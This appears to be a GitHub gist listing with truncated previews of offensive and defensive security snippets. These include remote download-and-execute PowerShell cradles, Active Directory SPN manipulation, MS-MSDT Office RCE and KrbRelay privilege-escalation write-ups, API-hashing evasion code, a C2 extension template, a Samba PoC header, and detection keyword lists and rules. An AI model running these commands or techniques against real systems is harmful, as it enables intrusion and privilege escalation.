Skip to content

Instantly share code, notes, and snippets.

View curtishoughton's full-sized avatar

Curtis Houghton curtishoughton

  • England, United Kingdom
View GitHub Profile
@LuemmelSec
LuemmelSec / Get-SPVersionInfo.ps1
Last active December 9, 2024 10:08
Script to get SharePoint Version and release date remotely
# To use the function, call it like this:
# iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1")
# Get-SPVersionInfo -ServerUrl "https://my-sharepointserver"
function Get-SPVersionInfo {
param (
[string]$ServerUrl,
[switch]$SkipCertificateCheck, # Flag to skip certificate checks
[switch]$SkipHttpErrorCheck # Flag to skip HTTP error handling
)
@nasbench
nasbench / pwsh_dirty_words.yml
Last active March 19, 2025 19:57
List of suspicious strings used by PowerShell `SuspiciousContentChecker` function
# Source: System.Management.Automation.dll
# This list is used to determin if a ScriptBlock contains potential suspicious content
# If a match is found an automatic 4104 with a "warning" level is generated.
# https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs
- "Add-Type"
- "AddSecurityPackage"
- "AdjustTokenPrivileges"
- "AllocHGlobal"
- "BindingFlags"
- "Bypass"
@rad9800
rad9800 / apihash.c
Last active October 4, 2023 00:47
Using macros and constexpr to make API hashing a bit more friendly
#include <Windows.h>
#include <winternl.h>
#pragma comment(linker, "/ENTRY:entry")
// Define hashing algorithm to use
#define HASHALGO HashStringDjb2
// Define how large you'd like cache to be
#define CACHE 50
@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@kevthehermit
kevthehermit / detection.yml
Last active September 16, 2022 22:55
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@freefirex
freefirex / gist:dec308e1d95c6ea090c61d31a4db6f89
Last active April 27, 2025 08:22
vscode user snippet for sliver coff extensions
{
"SliverExtension" :{
"prefix": "sliverext",
"body": [ "{",
"\"name\": \"$1\",",
"\"version\": \"0.0.0\",",
"\"command_name\": \"$2\",",
"\"extension_author\": \"$3\",",
"\"original_author\": \"$3\",",
"\"repo_url\": \"N/A\",",
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@tothi
tothi / krbrelay_privesc_howto.md
Last active April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@0xsha
0xsha / CVE-2021-44142.py
Last active October 3, 2023 13:34
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# (C) 2022 - 0xSha.io - @0xSha
# This PoC is un-weaponized and for educational purposes only .
# To learn how to use the PoC please read the writeup :
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python
# Refrences :
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092